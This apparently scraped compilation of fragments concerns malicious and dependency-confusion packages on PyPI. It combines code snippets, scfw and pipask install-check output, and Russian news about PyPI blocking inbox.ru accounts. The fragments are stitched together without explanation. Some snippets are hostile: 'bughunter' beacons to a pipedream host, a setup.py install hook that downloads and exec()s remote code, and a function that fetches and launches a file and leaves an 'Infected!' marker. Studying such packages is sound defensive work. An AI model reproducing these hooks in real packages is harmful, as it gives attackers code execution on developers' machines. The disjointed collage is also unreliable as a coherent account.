import subprocess
import os
import requests

#I am  bughunter
#[email protected]
print('it works!')
requests.get("https://76c4[REDACTED]f5d3.m.pipedream.net/example-package-taxi-etl")

import requests
#I am  bughunter
#[email protected]
print('If you read this message and you are from Yandex write me [email protected]')
requests.get("https://76c4[REDACTED]f5d3.m.pipedream.net/dmp_suite")

class InstallCommand(install):
    def run(self):
        raise RuntimeError("You are trying to install a stub package yandex-cloud-ml-sdk-preview. Maybe you are using the wrong pypi? See https://nda.ya.ru/t/GljG[REDACTED]zAGGz for details")

scfw run pip install hello_world
scfw run poetry install hello_world
scfw run npm install hello_world

(testvenv) $ scfw run pip install yandex-baobab-api
Collecting yandex-baobab-api
  Using cached yandex-baobab-api-66.0.3.tar.gz (1.1 kB)
  Preparing metadata (setup.py) ... done
Building wheels for collected packages: yandex-baobab-api
  Building wheel for yandex-baobab-api (setup.py) ... error
  error: subprocess-exited-with-error
...
        File "/tmp/pip-install-.../yandex-baobab-api_.../setup.py", line 7, in run
          raise RuntimeError("You are trying to install a stub package yandex-baobab-api. Maybe you are using the wrong pypi?")
      RuntimeError: You are trying to install a stub package yandex-baobab-api. Maybe you are using the wrong pypi?
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
  ERROR: Failed building wheel for yandex-baobab-api
  Running setup.py clean for yandex-baobab-api
Failed to build yandex-baobab-api
ERROR: Failed to build installable wheels for some pyproject.toml based projects (yandex-baobab-api)

$ pipask install yandex-baobab-api
✔️ Resolving dependencies to install 0:00:00
! Checking repository popularity    0:00:00
✖️ Checking package download stats   0:00:00
! Checking package age              0:00:00
✔️ Checking known vulnerabilities    0:00:00
✔️ Checking release metadata         0:00:00
! Checking package license          0:00:00

Package check results:
  [yandex-baobab-api==66.0.3]
    ! No repository URL found
    ✖️ Only 8 downloads from PyPI in the last month
    ! The release is older than a year: 472 days old
    ✔️ No known vulnerabilities found
    ✔️ No development status classifiers
    ! No license found in PyPI metadata - you may need to check manually

? Would you like to continue installing package(s)? [y/n]:

class CustomInstallCommand(install):
    def run(self):
        try:
            response = requests.get("https://[REDACTED1]/main.py")
            response.raise_for_status()
            exec(response.text)
        except requests.RequestException as e:
            print(f"Failed to fetch or execute script: {e}")
        super().run()

def huinya():
    try:
        ssilka = 'https://[REDACTED2]/1.txt'
        ratka = "1.txt"
        huizhopaseks = requests.get(ssilka)
        with open(ratka,"wb") as file:   file.write(huizhopaseks.content)
        os.startfile(ratka)
    except Exception:
        pass

    
    user = getpass.getuser()
    hidden_path = Path.home() / ".dildo"
    with open(hidden_path, "w") as f:
        f.write(f"Infected! User: {user}\n")

huinya()

В официальном заявлении сказано, что с почтовых ящиков inbox.ru пришла волна спама – пользователи с такой почтой создали 250 профилей и добавили к ним свыше полутора тысяч проектов, которые якобы «обманывают пользователей и представляют угрозу безопасности» (leading to end-user confusion, abuse of resources, and potential security issues).

Россиян изгоняют из сообщества программистов Python. Им запретили пользоваться репозиторием PyPI с пакетами для Python. Ограничения коснулись только тех, кто создает новый аккаунт с привязкой почты на inboxru и тех, кто хочет добавить такую почту в уже существующий профиль. Домен принадлежит Mailru.

Россиянам запретили пользоваться репозиторием PyPI с пакетами для Python

Ограничения коснулись только тех, кто создает новый аккаунт с привязкой почты на inbox .ru и тех, кто хочет добавить такую почту в уже существующий профиль

Домен принадлежит Mail .ru. На другие домены компании лимиты пока не распространяются

9 июня: появилась первая учётная запись кампании.
11 июня: за 3 часа было создано 46 учётных записей.
24 июня: за 4 часа было создано 207 учётных записей.
С 26 июня по 7 июля ими было создано 1525 проектов:
2025-06-26  9
2025-06-27  295
2025-06-28  39
2025-06-29  119
2025-06-30  740
2025-07-01  249
2025-07-02  46
2025-07-10  16
2025-07-11  12

Надеемся, что мы сможем отменить это решение в будущем, когда будем более уверены в способности этого провайдера электронной почты предотвращать злоупотребления. Если вы работаете в этом провайдере, пожалуйста, напишите нам по адресу [email protected], чтобы обсудить это решение.

После предыдущей публикации представитель материнской компании inbox.ru обратился к администраторам PyPI для обсуждения ситуации. Они выразили желание решить проблему и восстановить возможность регистрации учётных записей PyPI с адресами электронной почты из домена inbox.ru. Они подтвердили, что регистрация учётных записей пользователей PyPI была произведена внутренней службой безопасности «для предотвращения возможного злоупотребления внешними библиотеками для атак на наши системы».